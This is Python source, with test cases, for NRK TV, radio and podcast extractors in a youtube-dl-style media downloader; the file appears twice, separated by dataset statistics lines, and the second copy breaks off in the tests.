"url": "nrk:clip/150533",
"only_matching": True,
},
{
# program
"url": "nrk:MDDP12000117",
"only_matching": True,
},
{
"url": "nrk:program/ENRK10100318",
"only_matching": True,
},
{
# direkte
"url": "nrk:nrk1",
"only_matching": True,
},
{
"url": "nrk:channel/nrk1",
"only_matching": True,
},
]
def _real_extract(self, url):
video_id = self._match_id(url).split("/")[-1]
path_templ = "playback/%s/" + video_id
def call_playback_api(item, query=None):
return self._call_api(path_templ % item, video_id, item, query=query)
# known values for preferredCdn: akamai, iponly, minicdn and telenor
manifest = call_playback_api("manifest", {"preferredCdn": "akamai"})
video_id = try_get(manifest, lambda x: x["id"], compat_str) or video_id
if manifest.get("playability") == "nonPlayable":
self._raise_error(manifest["nonPlayable"])
playable = manifest["playable"]
formats = []
for asset in playable["assets"]:
if not isinstance(asset, dict):
continue
if asset.get("encrypted"):
continue
format_url = url_or_none(asset.get("url"))
if not format_url:
continue
asset_format = (asset.get("format") or "").lower()
if asset_format == "hls" or determine_ext(format_url) == "m3u8":
formats.extend(self._extract_nrk_formats(format_url, video_id))
elif asset_format == "mp3":
formats.append(
{
"url": format_url,
"format_id": asset_format,
"vcodec": "none",
}
)
self._sort_formats(formats)
data = call_playback_api("metadata")
preplay = data["preplay"]
titles = preplay["titles"]
title = titles["title"]
alt_title = titles.get("subtitle")
description = preplay.get("description")
duration = parse_duration(playable.get("duration")) or parse_duration(
data.get("duration")
)
thumbnails = []
for image in try_get(preplay, lambda x: x["poster"]["images"], list) or []:
if not isinstance(image, dict):
continue
image_url = url_or_none(image.get("url"))
if not image_url:
continue
thumbnails.append(
{
"url": image_url,
"width": int_or_none(image.get("pixelWidth")),
"height": int_or_none(image.get("pixelHeight")),
}
)
subtitles = {}
for sub in try_get(playable, lambda x: x["subtitles"], list) or []:
if not isinstance(sub, dict):
continue
sub_url = url_or_none(sub.get("webVtt"))
if not sub_url:
continue
sub_key = str_or_none(sub.get("language")) or "nb"
sub_type = str_or_none(sub.get("type"))
if sub_type:
sub_key += "-%s" % sub_type
subtitles.setdefault(sub_key, []).append(
{
"url": sub_url,
}
)
legal_age = try_get(
data, lambda x: x["legalAge"]["body"]["rating"]["code"], compat_str
)
# https://en.wikipedia.org/wiki/Norwegian_Media_Authority
age_limit = None
if legal_age:
if legal_age == "A":
age_limit = 0
elif legal_age.isdigit():
age_limit = int_or_none(legal_age)
is_series = try_get(data, lambda x: x["_links"]["series"]["name"]) == "series"
info = {
"id": video_id,
"title": title,
"alt_title": alt_title,
"description": description,
"duration": duration,
"thumbnails": thumbnails,
"age_limit": age_limit,
"formats": formats,
"subtitles": subtitles,
}
if is_series:
series = season_id = season_number = episode = episode_number = None
programs = self._call_api(
"programs/%s" % video_id, video_id, "programs", fatal=False
)
if programs and isinstance(programs, dict):
series = str_or_none(programs.get("seriesTitle"))
season_id = str_or_none(programs.get("seasonId"))
season_number = int_or_none(programs.get("seasonNumber"))
episode = str_or_none(programs.get("episodeTitle"))
episode_number = int_or_none(programs.get("episodeNumber"))
if not series:
series = title
if alt_title:
title += " - %s" % alt_title
if not season_number:
season_number = int_or_none(
self._search_regex(
r"Sesong\s+(\d+)",
description or "",
"season number",
default=None,
)
)
if not episode:
episode = alt_title if is_series else None
if not episode_number:
episode_number = int_or_none(
self._search_regex(
r"^(\d+)\.", episode or "", "episode number", default=None
)
)
if not episode_number:
episode_number = int_or_none(
self._search_regex(
r"\((\d+)\s*:\s*\d+\)",
description or "",
"episode number",
default=None,
)
)
info.update(
{
"title": title,
"series": series,
"season_id": season_id,
"season_number": season_number,
"episode": episode,
"episode_number": episode_number,
}
)
return info
class NRKTVIE(InfoExtractor):
IE_DESC = "NRK TV and NRK Radio"
_EPISODE_RE = r"(?P<id>[a-zA-Z]{4}\d{8})"
_VALID_URL = r"https?://(?:tv|radio)\.nrk(?:super)?\.no/(?:[^/]+/)*%s" % _EPISODE_RE
_TESTS = [
{
"url": "https://tv.nrk.no/program/MDDP12000117",
"md5": "c4a5960f1b00b40d47db65c1064e0ab1",
"info_dict": {
"id": "MDDP12000117",
"ext": "mp4",
"title": "Alarm Trolltunga",
"description": "md5:46923a6e6510eefcce23d5ef2a58f2ce",
"duration": 2223.44,
"age_limit": 6,
"subtitles": {
"nb-nor": [
{
"ext": "vtt",
}
],
"nb-ttv": [
{
"ext": "vtt",
}
],
},
},
},
{
"url": "https://tv.nrk.no/serie/20-spoersmaal-tv/MUHH48000314/23-05-2014",
"md5": "8d40dab61cea8ab0114e090b029a0565",
"info_dict": {
"id": "MUHH48000314",
"ext": "mp4",
"title": "20 spørsmål - 23. mai 2014",
"alt_title": "23. mai 2014",
"description": "md5:bdea103bc35494c143c6a9acdd84887a",
"duration": 1741,
"series": "20 spørsmål",
"episode": "23. mai 2014",
"age_limit": 0,
},
},
{
"url": "https://tv.nrk.no/program/mdfp15000514",
"info_dict": {
"id": "MDFP15000514",
"ext": "mp4",
"title": "Kunnskapskanalen - Grunnlovsjubiléet - Stor ståhei for ingenting",
"description": "md5:89290c5ccde1b3a24bb8050ab67fe1db",
"duration": 4605.08,
"series": "Kunnskapskanalen",
"episode": "Grunnlovsjubiléet - Stor ståhei for ingenting",
"age_limit": 0,
},
"params": {
"skip_download": True,
},
},
{
# single playlist video
"url": "https://tv.nrk.no/serie/tour-de-ski/MSPO40010515/06-01-2015#del=2",
"info_dict": {
"id": "MSPO40010515",
"ext": "mp4",
"title": "Sprint fri teknikk, kvinner og menn 06.01.2015",
"description": "md5:c03aba1e917561eface5214020551b7a",
"age_limit": 0,
},
"params": {
"skip_download": True,
},
"expected_warnings": ["Failed to download m3u8 information"],
"skip": "particular part is not supported currently",
},
{
"url": "https://tv.nrk.no/serie/tour-de-ski/MSPO40010515/06-01-2015",
"info_dict": {
"id": "MSPO40010515",
"ext": "mp4",
"title": "Sprint fri teknikk, kvinner og menn 06.01.2015",
"description": "md5:c03aba1e917561eface5214020551b7a",
"age_limit": 0,
},
"expected_warnings": ["Failed to download m3u8 information"],
"skip": "Ikke tilgjengelig utenfor Norge",
},
{
"url": "https://tv.nrk.no/serie/anno/KMTE50001317/sesong-3/episode-13",
"info_dict": {
"id": "KMTE50001317",
"ext": "mp4",
"title": "Anno - 13. episode",
"description": "md5:11d9613661a8dbe6f9bef54e3a4cbbfa",
"duration": 2340,
"series": "Anno",
"episode": "13. episode",
"season_number": 3,
"episode_number": 13,
"age_limit": 0,
},
"params": {
"skip_download": True,
},
},
{
"url": "https://tv.nrk.no/serie/nytt-paa-nytt/MUHH46000317/27-01-2017",
"info_dict": {
"id": "MUHH46000317",
"ext": "mp4",
"title": "Nytt på Nytt 27.01.2017",
"description": "md5:5358d6388fba0ea6f0b6d11c48b9eb4b",
"duration": 1796,
"series": "Nytt på nytt",
"episode": "27.01.2017",
"age_limit": 0,
},
"params": {
"skip_download": True,
},
"skip": "ProgramRightsHasExpired",
},
{
"url": "https://radio.nrk.no/serie/dagsnytt/NPUB21019315/12-07-2015#",
"only_matching": True,
},
{
"url": "https://tv.nrk.no/serie/lindmo/2018/MUHU11006318/avspiller",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/serie/dagsnytt/sesong/201507/NPUB21019315",
"only_matching": True,
},
]
def _real_extract(self, url):
video_id = self._match_id(url)
return self.url_result(
"nrk:%s" % video_id, ie=NRKIE.ie_key(), video_id=video_id
)
class NRKTVEpisodeIE(InfoExtractor):
_VALID_URL = r"https?://tv\.nrk\.no/serie/(?P<id>[^/]+/sesong/(?P<season_number>\d+)/episode/(?P<episode_number>\d+))"
_TESTS = [
{
"url": "https://tv.nrk.no/serie/hellums-kro/sesong/1/episode/2",
"info_dict": {
"id": "MUHH36005220",
"ext": "mp4",
"title": "Hellums kro - 2. Kro, krig og kjærlighet",
"description": "md5:ad92ddffc04cea8ce14b415deef81787",
"duration": 1563.92,
"series": "Hellums kro",
"season_number": 1,
"episode_number": 2,
"episode": "2. Kro, krig og kjærlighet",
"age_limit": 6,
},
"params": {
"skip_download": True,
},
},
{
"url": "https://tv.nrk.no/serie/backstage/sesong/1/episode/8",
"info_dict": {
"id": "MSUI14000816",
"ext": "mp4",
"title": "Backstage - 8. episode",
"description": "md5:de6ca5d5a2d56849e4021f2bf2850df4",
"duration": 1320,
"series": "Backstage",
"season_number": 1,
"episode_number": 8,
"episode": "8. episode",
"age_limit": 0,
},
"params": {
"skip_download": True,
},
"skip": "ProgramRightsHasExpired",
},
]
def _real_extract(self, url):
display_id, season_number, episode_number = re.match(
self._VALID_URL, url
).groups()
webpage = self._download_webpage(url, display_id)
info = self._search_json_ld(webpage, display_id, default={})
nrk_id = (
info.get("@id")
or self._html_search_meta("nrk:program-id", webpage, default=None)
or self._search_regex(
r'data-program-id=["\'](%s)' % NRKTVIE._EPISODE_RE, webpage, "nrk id"
)
)
assert re.match(NRKTVIE._EPISODE_RE, nrk_id)
info.update(
{
"_type": "url",
"id": nrk_id,
"url": "nrk:%s" % nrk_id,
"ie_key": NRKIE.ie_key(),
"season_number": int(season_number),
"episode_number": int(episode_number),
}
)
return info
class NRKTVSerieBaseIE(NRKBaseIE):
def _extract_entries(self, entry_list):
if not isinstance(entry_list, list):
return []
entries = []
for episode in entry_list:
nrk_id = episode.get("prfId") or episode.get("episodeId")
if not nrk_id or not isinstance(nrk_id, compat_str):
continue
entries.append(
self.url_result("nrk:%s" % nrk_id, ie=NRKIE.ie_key(), video_id=nrk_id)
)
return entries
_ASSETS_KEYS = (
"episodes",
"instalments",
)
def _extract_assets_key(self, embedded):
for asset_key in self._ASSETS_KEYS:
if embedded.get(asset_key):
return asset_key
@staticmethod
def _catalog_name(serie_kind):
return "podcast" if serie_kind in ("podcast", "podkast") else "series"
def _entries(self, data, display_id):
for page_num in itertools.count(1):
embedded = data.get("_embedded") or data
if not isinstance(embedded, dict):
break
assets_key = self._extract_assets_key(embedded)
if not assets_key:
break
# Extract entries
entries = try_get(
embedded,
(
lambda x: x[assets_key]["_embedded"][assets_key],
lambda x: x[assets_key],
),
list,
)
for e in self._extract_entries(entries):
yield e
# Find next URL
next_url_path = try_get(
data,
(
lambda x: x["_links"]["next"]["href"],
lambda x: x["_embedded"][assets_key]["_links"]["next"]["href"],
),
compat_str,
)
if not next_url_path:
break
data = self._call_api(
next_url_path,
display_id,
note="Downloading %s JSON page %d" % (assets_key, page_num),
fatal=False,
)
if not data:
break
class NRKTVSeasonIE(NRKTVSerieBaseIE):
_VALID_URL = r"""(?x)
https?://
(?P<domain>tv|radio)\.nrk\.no/
(?P<serie_kind>serie|pod[ck]ast)/
(?P<serie>[^/]+)/
(?:
(?:sesong/)?(?P<id>\d+)|
sesong/(?P<id_2>[^/?#&]+)
)
"""
_TESTS = [
{
"url": "https://tv.nrk.no/serie/backstage/sesong/1",
"info_dict": {
"id": "backstage/1",
"title": "Sesong 1",
},
"playlist_mincount": 30,
},
{
# no /sesong/ in path
"url": "https://tv.nrk.no/serie/lindmo/2016",
"info_dict": {
"id": "lindmo/2016",
"title": "2016",
},
"playlist_mincount": 29,
},
{
# weird nested _embedded in catalog JSON response
"url": "https://radio.nrk.no/serie/dickie-dick-dickens/sesong/1",
"info_dict": {
"id": "dickie-dick-dickens/1",
"title": "Sesong 1",
},
"playlist_mincount": 11,
},
{
# 841 entries, multi page
"url": "https://radio.nrk.no/serie/dagsnytt/sesong/201509",
"info_dict": {
"id": "dagsnytt/201509",
"title": "September 2015",
},
"playlist_mincount": 841,
},
{
# 180 entries, single page
"url": "https://tv.nrk.no/serie/spangas/sesong/1",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/podkast/hele_historien/sesong/diagnose-kverulant",
"info_dict": {
"id": "hele_historien/diagnose-kverulant",
"title": "Diagnose kverulant",
},
"playlist_mincount": 3,
},
{
"url": "https://radio.nrk.no/podkast/loerdagsraadet/sesong/202101",
"only_matching": True,
},
]
@classmethod
def suitable(cls, url):
return (
False
if NRKTVIE.suitable(url)
or NRKTVEpisodeIE.suitable(url)
or NRKRadioPodkastIE.suitable(url)
else super(NRKTVSeasonIE, cls).suitable(url)
)
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
domain = mobj.group("domain")
serie_kind = mobj.group("serie_kind")
serie = mobj.group("serie")
season_id = mobj.group("id") or mobj.group("id_2")
display_id = "%s/%s" % (serie, season_id)
data = self._call_api(
"%s/catalog/%s/%s/seasons/%s"
% (domain, self._catalog_name(serie_kind), serie, season_id),
display_id,
"season",
query={"pageSize": 50},
)
title = try_get(data, lambda x: x["titles"]["title"], compat_str) or display_id
return self.playlist_result(self._entries(data, display_id), display_id, title)
class NRKTVSeriesIE(NRKTVSerieBaseIE):
_VALID_URL = r"https?://(?P<domain>(?:tv|radio)\.nrk|(?:tv\.)?nrksuper)\.no/(?P<serie_kind>serie|pod[ck]ast)/(?P<id>[^/]+)"
_TESTS = [
{
# new layout, instalments
"url": "https://tv.nrk.no/serie/groenn-glede",
"info_dict": {
"id": "groenn-glede",
"title": "Grønn glede",
"description": "md5:7576e92ae7f65da6993cf90ee29e4608",
},
"playlist_mincount": 90,
},
{
# new layout, instalments, more entries
"url": "https://tv.nrk.no/serie/lindmo",
"only_matching": True,
},
{
"url": "https://tv.nrk.no/serie/blank",
"info_dict": {
"id": "blank",
"title": "Blank",
"description": "md5:7664b4e7e77dc6810cd3bca367c25b6e",
},
"playlist_mincount": 30,
},
{
# new layout, seasons
"url": "https://tv.nrk.no/serie/backstage",
"info_dict": {
"id": "backstage",
"title": "Backstage",
"description": "md5:63692ceb96813d9a207e9910483d948b",
},
"playlist_mincount": 60,
},
{
# old layout
"url": "https://tv.nrksuper.no/serie/labyrint",
"info_dict": {
"id": "labyrint",
"title": "Labyrint",
"description": "I Daidalos sin undersjøiske Labyrint venter spennende oppgaver, skumle robotskapninger og slim.",
},
"playlist_mincount": 3,
},
{
"url": "https://tv.nrk.no/serie/broedrene-dal-og-spektralsteinene",
"only_matching": True,
},
{
"url": "https://tv.nrk.no/serie/saving-the-human-race",
"only_matching": True,
},
{
"url": "https://tv.nrk.no/serie/postmann-pat",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/serie/dickie-dick-dickens",
"info_dict": {
"id": "dickie-dick-dickens",
"title": "Dickie Dick Dickens",
"description": "md5:19e67411ffe57f7dce08a943d7a0b91f",
},
"playlist_mincount": 8,
},
{
"url": "https://nrksuper.no/serie/labyrint",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/podkast/ulrikkes_univers",
"info_dict": {
"id": "ulrikkes_univers",
},
"playlist_mincount": 10,
},
{
"url": "https://radio.nrk.no/podkast/ulrikkes_univers/nrkno-poddkast-26588-134079-05042018030000",
"only_matching": True,
},
]
@classmethod
def suitable(cls, url):
return (
False
if any(
ie.suitable(url)
for ie in (NRKTVIE, NRKTVEpisodeIE, NRKRadioPodkastIE, NRKTVSeasonIE)
)
else super(NRKTVSeriesIE, cls).suitable(url)
)
def _real_extract(self, url):
site, serie_kind, series_id = re.match(self._VALID_URL, url).groups()
is_radio = site == "radio.nrk"
domain = "radio" if is_radio else "tv"
size_prefix = "p" if is_radio else "embeddedInstalmentsP"
series = self._call_api(
"%s/catalog/%s/%s" % (domain, self._catalog_name(serie_kind), series_id),
series_id,
"serie",
query={size_prefix + "ageSize": 50},
)
titles = (
try_get(
series,
[
lambda x: x["titles"],
lambda x: x[x["type"]]["titles"],
lambda x: x[x["seriesType"]]["titles"],
],
)
or {}
)
entries = []
entries.extend(self._entries(series, series_id))
embedded = series.get("_embedded") or {}
linked_seasons = try_get(series, lambda x: x["_links"]["seasons"]) or []
embedded_seasons = embedded.get("seasons") or []
if len(linked_seasons) > len(embedded_seasons):
for season in linked_seasons:
season_url = urljoin(url, season.get("href"))
if not season_url:
season_name = season.get("name")
if season_name and isinstance(season_name, compat_str):
season_url = "https://%s.nrk.no/serie/%s/sesong/%s" % (
domain,
series_id,
season_name,
)
if season_url:
entries.append(
self.url_result(
season_url,
ie=NRKTVSeasonIE.ie_key(),
video_title=season.get("title"),
)
)
else:
for season in embedded_seasons:
entries.extend(self._entries(season, series_id))
entries.extend(self._entries(embedded.get("extraMaterial") or {}, series_id))
return self.playlist_result(
entries, series_id, titles.get("title"), titles.get("subtitle")
)
class NRKTVDirekteIE(NRKTVIE):
IE_DESC = "NRK TV Direkte and NRK Radio Direkte"
_VALID_URL = r"https?://(?:tv|radio)\.nrk\.no/direkte/(?P<id>[^/?#&]+)"
_TESTS = [
{
"url": "https://tv.nrk.no/direkte/nrk1",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/direkte/p1_oslo_akershus",
"only_matching": True,
},
]
class NRKRadioPodkastIE(InfoExtractor):
_VALID_URL = r"https?://radio\.nrk\.no/pod[ck]ast/(?:[^/]+/)+(?P<id>l_[\da-f]{8}-[\da-f]{4}-[\da-f]{4}-[\da-f]{4}-[\da-f]{12})"
_TESTS = [
{
"url": "https://radio.nrk.no/podkast/ulrikkes_univers/l_96f4f1b0-de54-4e6a-b4f1-b0de54fe6af8",
"md5": "8d40dab61cea8ab0114e090b029a0565",
"info_dict": {
"id": "MUHH48000314AA",
"ext": "mp4",
"title": "20 spørsmål 23.05.2014",
"description": "md5:bdea103bc35494c143c6a9acdd84887a",
"duration": 1741,
"series": "20 spørsmål",
"episode": "23.05.2014",
},
},
{
"url": "https://radio.nrk.no/podcast/ulrikkes_univers/l_96f4f1b0-de54-4e6a-b4f1-b0de54fe6af8",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/podkast/ulrikkes_univers/sesong/1/l_96f4f1b0-de54-4e6a-b4f1-b0de54fe6af8",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/podkast/hele_historien/sesong/bortfoert-i-bergen/l_774d1a2c-7aa7-4965-8d1a-2c7aa7d9652c",
"only_matching": True,
},
]
def _real_extract(self, url):
video_id = self._match_id(url)
return self.url_result(
"nrk:%s" % video_id, ie=NRKIE.ie_key(), video_id=video_id
)
class NRKPlaylistBaseIE(InfoExtractor):
def _extract_description(self, webpage):
pass
def _real_extract(self, url):
playlist_id = self._match_id(url)
webpage = self._download_webpage(url, playlist_id)
entries = [
self.url_result("nrk:%s" % video_id, NRKIE.ie_key())
for video_id in re.findall(self._ITEM_RE, webpage)
]
playlist_title = self._extract_title(webpage)
playlist_description = self._extract_description(webpage)
return self.playlist_result(
entries, playlist_id, playlist_title, playlist_description
)
class NRKPlaylistIE(NRKPlaylistBaseIE):
_VALID_URL = r"https?://(?:www\.)?nrk\.no/(?!video|skole)(?:[^/]+/)+(?P<id>[^/]+)"
_ITEM_RE = r'class="[^"]*\brich\b[^"]*"[^>]+data-video-id="([^"]+)"'
_TESTS = [
{
"url": "http://www.nrk.no/troms/gjenopplev-den-historiske-solformorkelsen-1.12270763",
"info_dict": {
"id": "gjenopplev-den-historiske-solformorkelsen-1.12270763",
"title": "Gjenopplev den historiske solformørkelsen",
"description": "md5:c2df8ea3bac5654a26fc2834a542feed",
},
"playlist_count": 2,
},
{
"url": "http://www.nrk.no/kultur/bok/rivertonprisen-til-karin-fossum-1.12266449",
"info_dict": {
"id": "rivertonprisen-til-karin-fossum-1.12266449",
"title": "Rivertonprisen til Karin Fossum",
"description": "Første kvinne på 15 år til å vinne krimlitteraturprisen.",
},
"playlist_count": 2,
},
]
def _extract_title(self, webpage):
return self._og_search_title(webpage, fatal=False)
def _extract_description(self, webpage):
return self._og_search_description(webpage)
class NRKTVEpisodesIE(NRKPlaylistBaseIE):
_VALID_URL = r"https?://tv\.nrk\.no/program/[Ee]pisodes/[^/]+/(?P<id>\d+)"
_ITEM_RE = r'data-episode=["\']%s' % NRKTVIE._EPISODE_RE
_TESTS = [
{
"url": "https://tv.nrk.no/program/episodes/nytt-paa-nytt/69031",
"info_dict": {
"id": "69031",
"title": "Nytt på nytt, sesong: 201210",
},
"playlist_count": 4,
}
]
def _extract_title(self, webpage):
return self._html_search_regex(
r"<h1>([^<]+)</h1>", webpage, "title", fatal=False
)
class NRKSkoleIE(InfoExtractor):
IE_DESC = "NRK Skole"
_VALID_URL = r"https?://(?:www\.)?nrk\.no/skole/?\?.*\bmediaId=(?P<id>\d+)"
_TESTS = [
{
"url": "https://www.nrk.no/skole/?page=search&q=&mediaId=14099",
"md5": "18c12c3d071953c3bf8d54ef6b2587b7",
"info_dict": {
"id": "6021",
"ext": "mp4",
"title": "Genetikk og eneggede tvillinger",
"description": "md5:3aca25dcf38ec30f0363428d2b265f8d",
"duration": 399,
},
},
{
"url": "https://www.nrk.no/skole/?page=objectives&subject=naturfag&objective=K15114&mediaId=19355",
"only_matching": True,
},
]
def _real_extract(self, url):
video_id = self._match_id(url)
nrk_id = self._download_json(
"https://nrkno-skole-prod.kube.nrk.no/skole/api/media/%s" % video_id,
video_id,
)["psId"]
return self.url_result("nrk:%s" % nrk_id)
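# Usage sketch (illustrative): extractors in this family resolve public URLs
# down to internal "nrk:<id>" items handled by NRKIE, so the following all
# route through the same playback API (assuming the fork exposes a
# youtube-dl-style `nextdl` command line; URLs taken from the tests above):
#
#   nextdl "https://tv.nrk.no/serie/backstage/sesong/1/episode/8"
#   nextdl "https://radio.nrk.no/podkast/ulrikkes_univers"
#   nextdl "nrk:MDDP12000117"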
| 34.63778
| 131
| 0.47865
|
from __future__ import unicode_literals
import itertools
import random
import re
from ..compat import compat_str
from ..utils import (ExtractorError, determine_ext, int_or_none,
parse_duration, str_or_none, try_get, url_or_none,
urljoin)
from .common import InfoExtractor
class NRKBaseIE(InfoExtractor):
_GEO_COUNTRIES = ["NO"]
_CDN_REPL_REGEX = r"""(?x)://
(?:
nrkod\d{1,2}-httpcache0-47115-cacheod0\.dna\.ip-only\.net/47115-cacheod0|
nrk-od-no\.telenorcdn\.net|
minicdn-od\.nrk\.no/od/nrkhd-osl-rr\.netwerk\.no/no
)/"""
def _extract_nrk_formats(self, asset_url, video_id):
if re.match(r"https?://[^/]+\.akamaihd\.net/i/", asset_url):
return self._extract_akamai_formats(asset_url, video_id)
asset_url = re.sub(r"(?:bw_(?:low|high)=\d+|no_audio_only)&?", "", asset_url)
formats = self._extract_m3u8_formats(
asset_url, video_id, "mp4", "m3u8_native", fatal=False
)
if not formats and re.search(self._CDN_REPL_REGEX, asset_url):
formats = self._extract_m3u8_formats(
re.sub(
self._CDN_REPL_REGEX,
"://nrk-od-%02d.akamaized.net/no/" % random.randint(0, 99),
asset_url,
),
video_id,
"mp4",
"m3u8_native",
fatal=False,
)
return formats
def _raise_error(self, data):
MESSAGES = {
"ProgramRightsAreNotReady": "Du kan dessverre ikke se eller høre programmet",
"ProgramRightsHasExpired": "Programmet har gått ut",
"NoProgramRights": "Ikke tilgjengelig",
"ProgramIsGeoBlocked": "NRK har ikke rettigheter til å vise dette programmet utenfor Norge",
}
message_type = data.get("messageType", "")
if (
"IsGeoBlocked" in message_type
or try_get(data, lambda x: x["usageRights"]["isGeoBlocked"]) is True
):
self.raise_geo_restricted(
msg=MESSAGES.get("ProgramIsGeoBlocked"), countries=self._GEO_COUNTRIES
)
message = data.get("endUserMessage") or MESSAGES.get(message_type, message_type)
raise ExtractorError("%s said: %s" % (self.IE_NAME, message), expected=True)
def _call_api(self, path, video_id, item=None, note=None, fatal=True, query=None):
return self._download_json(
urljoin("https://psapi.nrk.no/", path),
video_id,
note or "Downloading %s JSON" % item,
fatal=fatal,
query=query,
headers={"Accept-Encoding": "gzip, deflate, br"},
)
class NRKIE(NRKBaseIE):
_VALID_URL = r"""(?x)
(?:
nrk:|
https?://
(?:
(?:www\.)?nrk\.no/video/(?:PS\*|[^_]+_)|
v8[-.]psapi\.nrk\.no/mediaelement/
)
)
(?P<id>[^?\#&]+)
"""
_TESTS = [
{
"url": "http://www.nrk.no/video/PS*150533",
"md5": "f46be075326e23ad0e524edfcb06aeb6",
"info_dict": {
"id": "150533",
"ext": "mp4",
"title": "Dompap og andre fugler i Piip-Show",
"description": "md5:d9261ba34c43b61c812cb6b0269a5c8f",
"duration": 262,
},
},
{
"url": "http://www.nrk.no/video/PS*154915",
"info_dict": {
"id": "154915",
"ext": "mp4",
"title": "Slik høres internett ut når du er blind",
"description": "md5:a621f5cc1bd75c8d5104cb048c6b8568",
"duration": 20,
},
},
{
"url": "nrk:ecc1b952-96dc-4a98-81b9-5296dc7a98d9",
"only_matching": True,
},
{
"url": "nrk:clip/7707d5a3-ebe7-434a-87d5-a3ebe7a34a70",
"only_matching": True,
},
{
"url": "https://v8-psapi.nrk.no/mediaelement/ecc1b952-96dc-4a98-81b9-5296dc7a98d9",
"only_matching": True,
},
{
"url": "https://www.nrk.no/video/dompap-og-andre-fugler-i-piip-show_150533",
"only_matching": True,
},
{
"url": "https://www.nrk.no/video/humor/kommentatorboksen-reiser-til-sjos_d1fda11f-a4ad-437a-a374-0398bc84e999",
"only_matching": True,
},
{
"url": "nrk:l_96f4f1b0-de54-4e6a-b4f1-b0de54fe6af8",
"only_matching": True,
},
{
"url": "nrk:podcast/l_96f4f1b0-de54-4e6a-b4f1-b0de54fe6af8",
"only_matching": True,
},
{
"url": "nrk:150533",
"only_matching": True,
},
{
"url": "nrk:clip/150533",
"only_matching": True,
},
{
"url": "nrk:MDDP12000117",
"only_matching": True,
},
{
"url": "nrk:program/ENRK10100318",
"only_matching": True,
},
{
"url": "nrk:nrk1",
"only_matching": True,
},
{
"url": "nrk:channel/nrk1",
"only_matching": True,
},
]
def _real_extract(self, url):
video_id = self._match_id(url).split("/")[-1]
path_templ = "playback/%s/" + video_id
def call_playback_api(item, query=None):
return self._call_api(path_templ % item, video_id, item, query=query)
manifest = call_playback_api("manifest", {"preferredCdn": "akamai"})
video_id = try_get(manifest, lambda x: x["id"], compat_str) or video_id
if manifest.get("playability") == "nonPlayable":
self._raise_error(manifest["nonPlayable"])
playable = manifest["playable"]
formats = []
for asset in playable["assets"]:
if not isinstance(asset, dict):
continue
if asset.get("encrypted"):
continue
format_url = url_or_none(asset.get("url"))
if not format_url:
continue
asset_format = (asset.get("format") or "").lower()
if asset_format == "hls" or determine_ext(format_url) == "m3u8":
formats.extend(self._extract_nrk_formats(format_url, video_id))
elif asset_format == "mp3":
formats.append(
{
"url": format_url,
"format_id": asset_format,
"vcodec": "none",
}
)
self._sort_formats(formats)
data = call_playback_api("metadata")
preplay = data["preplay"]
titles = preplay["titles"]
title = titles["title"]
alt_title = titles.get("subtitle")
description = preplay.get("description")
duration = parse_duration(playable.get("duration")) or parse_duration(
data.get("duration")
)
thumbnails = []
for image in try_get(preplay, lambda x: x["poster"]["images"], list) or []:
if not isinstance(image, dict):
continue
image_url = url_or_none(image.get("url"))
if not image_url:
continue
thumbnails.append(
{
"url": image_url,
"width": int_or_none(image.get("pixelWidth")),
"height": int_or_none(image.get("pixelHeight")),
}
)
subtitles = {}
for sub in try_get(playable, lambda x: x["subtitles"], list) or []:
if not isinstance(sub, dict):
continue
sub_url = url_or_none(sub.get("webVtt"))
if not sub_url:
continue
sub_key = str_or_none(sub.get("language")) or "nb"
sub_type = str_or_none(sub.get("type"))
if sub_type:
sub_key += "-%s" % sub_type
subtitles.setdefault(sub_key, []).append(
{
"url": sub_url,
}
)
legal_age = try_get(
data, lambda x: x["legalAge"]["body"]["rating"]["code"], compat_str
)
age_limit = None
if legal_age:
if legal_age == "A":
age_limit = 0
elif legal_age.isdigit():
age_limit = int_or_none(legal_age)
is_series = try_get(data, lambda x: x["_links"]["series"]["name"]) == "series"
info = {
"id": video_id,
"title": title,
"alt_title": alt_title,
"description": description,
"duration": duration,
"thumbnails": thumbnails,
"age_limit": age_limit,
"formats": formats,
"subtitles": subtitles,
}
if is_series:
series = season_id = season_number = episode = episode_number = None
programs = self._call_api(
"programs/%s" % video_id, video_id, "programs", fatal=False
)
if programs and isinstance(programs, dict):
series = str_or_none(programs.get("seriesTitle"))
season_id = str_or_none(programs.get("seasonId"))
season_number = int_or_none(programs.get("seasonNumber"))
episode = str_or_none(programs.get("episodeTitle"))
episode_number = int_or_none(programs.get("episodeNumber"))
if not series:
series = title
if alt_title:
title += " - %s" % alt_title
if not season_number:
season_number = int_or_none(
self._search_regex(
r"Sesong\s+(\d+)",
description or "",
"season number",
default=None,
)
)
if not episode:
episode = alt_title if is_series else None
if not episode_number:
episode_number = int_or_none(
self._search_regex(
r"^(\d+)\.", episode or "", "episode number", default=None
)
)
if not episode_number:
episode_number = int_or_none(
self._search_regex(
r"\((\d+)\s*:\s*\d+\)",
description or "",
"episode number",
default=None,
)
)
info.update(
{
"title": title,
"series": series,
"season_id": season_id,
"season_number": season_number,
"episode": episode,
"episode_number": episode_number,
}
)
return info
class NRKTVIE(InfoExtractor):
IE_DESC = "NRK TV and NRK Radio"
_EPISODE_RE = r"(?P<id>[a-zA-Z]{4}\d{8})"
_VALID_URL = r"https?://(?:tv|radio)\.nrk(?:super)?\.no/(?:[^/]+/)*%s" % _EPISODE_RE
_TESTS = [
{
"url": "https://tv.nrk.no/program/MDDP12000117",
"md5": "c4a5960f1b00b40d47db65c1064e0ab1",
"info_dict": {
"id": "MDDP12000117",
"ext": "mp4",
"title": "Alarm Trolltunga",
"description": "md5:46923a6e6510eefcce23d5ef2a58f2ce",
"duration": 2223.44,
"age_limit": 6,
"subtitles": {
"nb-nor": [
{
"ext": "vtt",
}
],
"nb-ttv": [
{
"ext": "vtt",
}
],
},
},
},
{
"url": "https://tv.nrk.no/serie/20-spoersmaal-tv/MUHH48000314/23-05-2014",
"md5": "8d40dab61cea8ab0114e090b029a0565",
"info_dict": {
"id": "MUHH48000314",
"ext": "mp4",
"title": "20 spørsmål - 23. mai 2014",
"alt_title": "23. mai 2014",
"description": "md5:bdea103bc35494c143c6a9acdd84887a",
"duration": 1741,
"series": "20 spørsmål",
"episode": "23. mai 2014",
"age_limit": 0,
},
},
{
